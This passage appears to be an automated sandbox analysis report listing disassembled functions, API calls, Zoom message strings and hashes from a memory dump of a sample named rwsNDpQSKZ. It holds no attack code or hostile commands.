                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: HostSnsType$com.Zoom.app.conf.claimhost
                • API String ID: 4281283084-1563626713
                • Opcode ID: 98104092674f2e5f80e42c55b3ef9079a7f88ddcc7a559862a28a5bf060ebe75
                • Instruction ID: 2b0b7526e107898caa0292d01c8e2dde28bfb8ed4263bf90fbbd2936a59aa462
                • Opcode Fuzzy Hash: 98104092674f2e5f80e42c55b3ef9079a7f88ddcc7a559862a28a5bf060ebe75
                • Instruction Fuzzy Hash: 0DE0D870A00390A7D710BF149C4971E33A4DB54B19F800428B2055F381CFF84D05E7B5
                Function 00C74C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74C17
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnSetBackupSuperNodeInfo,000027A6,data,00000004), ref: 00C74C32
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnSetBackupSuperNodeInfo$data
                • API String ID: 3166440930-1690969339
                • Opcode ID: 85ba74033bbc0e4e02074610ceedcb02d731e78f587f400650ca8e5f4d2aac0d
                • Instruction ID: ea86b960f45bfa4a8e19d4562358d270fbf778be4594c57f32cc021c27d8d095
                • Opcode Fuzzy Hash: 85ba74033bbc0e4e02074610ceedcb02d731e78f587f400650ca8e5f4d2aac0d
                • Instruction Fuzzy Hash: 35E0DFB0A00780A7DB20BB10AC85B1E76B8AB90B1AF604538B2165A3D6CBF44984D7B5
                Function 00C6ADF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ADF7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.updateLCP,00002736,B64String,00000004), ref: 00C6AE12
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: B64String$com.Zoom.app.conf.updateLCP
                • API String ID: 3166440930-692587612
                • Opcode ID: 85f95ee4ad018b10356ab193765ed1b74f4dc042c4e710bf7e6161ab506c1b8f
                • Instruction ID: 033b427de1fa4575afe308cacd3a0d9e1d8cf688c1fcb09cc0fa8fe0c0cb4c54
                • Opcode Fuzzy Hash: 85f95ee4ad018b10356ab193765ed1b74f4dc042c4e710bf7e6161ab506c1b8f
                • Instruction Fuzzy Hash: 52E0D8F0A0078067C7307B115C85B1E66B4A750B55F840D2CB6056F3D1CBF54D44DB75
                Function 00C74D30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74D37
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.enable.subscribe.presence,00002783,enable,00000004), ref: 00C74D52
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.enable.subscribe.presence$enable
                • API String ID: 4281283084-3039794735
                • Opcode ID: c7b5bcff4848d898c9ab89a2b762202a547413b36baaff7e50c2b661a889456b
                • Instruction ID: bb7e7ac6e63c8c19544f61e341341f3a3a7f5c13375bd754c3d1132b187633f4
                • Opcode Fuzzy Hash: c7b5bcff4848d898c9ab89a2b762202a547413b36baaff7e50c2b661a889456b
                • Instruction Fuzzy Hash: 23E092B190478477D720AB259C89B1F22A4E751F19F94046CB1185A391CBF40940D7B8
                Function 00C6CEC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CEC7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.audio.device.fail.notification,00009CC6,FailReason,00000004), ref: 00C6CEE2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: FailReason$com.zoom.app.assistant.sip.audio.device.fail.notification
                • API String ID: 4281283084-117400061
                • Opcode ID: 1e6eefb1c4c373c95014d429c150541994d0677ee942b2e86fd94f0aff77d542
                • Instruction ID: 0d99ed8215b8805ddc789af30a429c0e344dbfdfd87aae28445a69d4ef0efc39
                • Opcode Fuzzy Hash: 1e6eefb1c4c373c95014d429c150541994d0677ee942b2e86fd94f0aff77d542
                • Instruction Fuzzy Hash: ACE09AB0A04380A7D720BB108949B2E27A4AB40B1AF81047DB2046B382CBF84800E7B5
                Function 00C6EEB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EEB7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.network.device.refresh.request,00009DDC,deviceType,00000004), ref: 00C6EED2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.network.device.refresh.request$deviceType
                • API String ID: 4281283084-4076288596
                • Opcode ID: d908724bd628304deaef016e5d088620299c7ebfeab4287f863efd85a22b0e1a
                • Instruction ID: 91321f3c1559a9176e60f0f2474cf4d2eadb62e387bc36f3a071f78d9fe8ee9d
                • Opcode Fuzzy Hash: d908724bd628304deaef016e5d088620299c7ebfeab4287f863efd85a22b0e1a
                • Instruction Fuzzy Hash: CFE0D8B0640754ABC7207B154C8675F26E4BB50756F90096DF2455E3C2CBF44841DB74
                Function 00CCACE0 Relevance: 6.2, APIs: 4, Instructions: 219COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00CCADE3
                  • Part of subcall function 00CE2A64: __EH_prolog3.LIBCMT ref: 00CE2A6B
                  • Part of subcall function 00CE2A64: std::_Lockit::_Lockit.LIBCPMT ref: 00CE2A76
                  • Part of subcall function 00CE2A64: std::locale::_Setgloballocale.LIBCPMT ref: 00CE2A91
                  • Part of subcall function 00CE2A64: _Yarn.LIBCPMT ref: 00CE2AA7
                  • Part of subcall function 00CE2A64: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D22C78,00000000,00000004,00C52106,00000001,00000000,00000000,00000004,00000000,00000000,?), ref: 00CE2AB9
                  • Part of subcall function 00CE2A64: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000004,00C52106,00000001,00000000,00000000,00000004,00000000,00000000,?), ref: 00CE2ADA
                  • Part of subcall function 00CE2A64: std::_Lockit::~_Lockit.LIBCPMT ref: 00CE2AE7
                  • Part of subcall function 00C59E72: __EH_prolog3.LIBCMT ref: 00C59E79
                  • Part of subcall function 00C59E72: std::_Lockit::_Lockit.LIBCPMT ref: 00C59E83
                  • Part of subcall function 00C59E72: int.LIBCPMT ref: 00C59E9A
                  • Part of subcall function 00C59E72: std::_Lockit::~_Lockit.LIBCPMT ref: 00C59EF4
                • std::locale::_Init.LIBCPMT ref: 00CCAE9C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Lockitstd::_$std::locale::_$Cmm@@H_prolog3InitLockit::_Lockit::~_State@Unlock@$SetgloballocaleYarn
                • String ID:
                • API String ID: 2569103634-0
                • Opcode ID: dd3b336a25e0a5780815011b88b251b37ee55bf4edeba44b406614756e55b1a1
                • Instruction ID: ab2bc70115a09c42a8f37fc070e1c256eff0f221adfd1aa768850cf6fe7e70d1
                • Opcode Fuzzy Hash: dd3b336a25e0a5780815011b88b251b37ee55bf4edeba44b406614756e55b1a1
                • Instruction Fuzzy Hash: 549146B1900205DFDB14CF54C498B9ABBF4FF09314F1481A9D8199B782D7BAAA58CFE1
                Function 00C5A620 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_catch.LIBCMT ref: 00C5A627
                • ??0?$CStringT@D@Cmm@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,00000018,00C557E3,?,00000000,?,00000000,000000FF,?,00000000,?,?,?,?,00000034), ref: 00C5A6AD
                • _Deallocate.LIBCONCRT ref: 00C5A6FE
                  • Part of subcall function 00C5C080: ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,00000000,?,?), ref: 00C5C0A0
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5A749
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@String$Concurrency::cancel_current_taskD@2@@std@@@D@std@@DeallocateE@$$H_prolog3_catchU?$char_traits@V01@@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 33380148-0
                • Opcode ID: 76e2bb7ca543f16c038501a34495d64c340f3b24b35ce738eec20e08aa356c25
                • Instruction ID: 72a515da46c9366154e90d5f6ae25e10f0acb0d2fbab0d154fe3ffb186c94cc2
                • Opcode Fuzzy Hash: 76e2bb7ca543f16c038501a34495d64c340f3b24b35ce738eec20e08aa356c25
                • Instruction Fuzzy Hash: D9319235600605CFCB18DF69C48599EBBF6AF88341B34852EF885D7261EA70E984DB54
                Function 00CB2600 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                Download Yara Rule
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,?,?,00CB25E7,00000000,?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB2609
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000005,00000000,00000000), ref: 00CB26B5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
